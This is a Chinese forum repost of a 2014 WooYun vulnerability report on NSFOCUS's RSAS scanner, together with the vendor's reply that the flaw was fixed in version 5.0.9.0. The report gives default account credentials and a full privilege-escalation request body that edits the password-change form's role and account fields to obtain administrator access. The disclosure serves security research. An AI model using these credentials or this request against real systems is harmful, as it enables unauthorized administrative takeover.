发新话题
打印

绿盟远程安全评估系统逻辑漏洞直接进入管理通杀之一

绿盟远程安全评估系统逻辑漏洞直接进入管理通杀之一

漏洞概要
缺陷编号:        WooYun-2014-66244
漏洞标题:        绿盟远程安全评估系统逻辑漏洞直接进入管理通杀之一
相关厂商:        绿盟科技
漏洞作者:        路人甲
提交时间:        2014-06-26 08:24
公开时间:        2014-06-26 13:50
漏洞类型:        设计缺陷/逻辑错误
危害等级:        高
自评Rank:        20
漏洞状态:        漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:        http://www.wooyun.org
Tags标签:       逻辑错误

漏洞详情披露状态:
2014-06-26:        细节已通知厂商并且等待厂商处理中
2014-06-26:        厂商已经主动忽略漏洞,细节向公众公开

简要描述:漏洞如下.
详细说明:默认2个帐号:reporter,auditor密码是nsfocus。



用普通帐号登陆,修改密码处,




code 区域user%5Baccount%5D=admin&user%5Bname%5D=Admin&user%5Bpassword%5D=admin123&user%5Bpassword.confirm%5D=admin123&user%5Bmail%5D=admin%40example.com&user%5Broles%5D=ADMINISTRATORS&user%5BallowLoginIp%5D=*.*.*.*&user%5BallowScanIp%5D=*.*.*.*&user%5BmaxTask%5D=150

1 处修改ADMINISTRATORS



2 处修改 帐号 admin 就可以了。



最后即可admin登陆。

漏洞证明:如上
修复方案:程序开发人员修改下。加上码。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-26 13:50
厂商回复:谢谢告知。由于没有告知具体设备版本号,经过研发人员排查,此漏洞为已知漏洞,影响RSAS 5.0.8.13及以前版本,已在RSAS v 5.0.9.0版本中修复,2011-09-22升级包发布。

目前RSAS V5最新版本5.0.13以及RSAS V6均不受此漏洞影响。

如能告知发现此问题的设备的具体版本号,我们可做进一步的排查确认,非常感谢。

最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2014-066244

[ 本帖最后由 linda 于 2016-2-15 15:55 编辑 ]

TOP

发新话题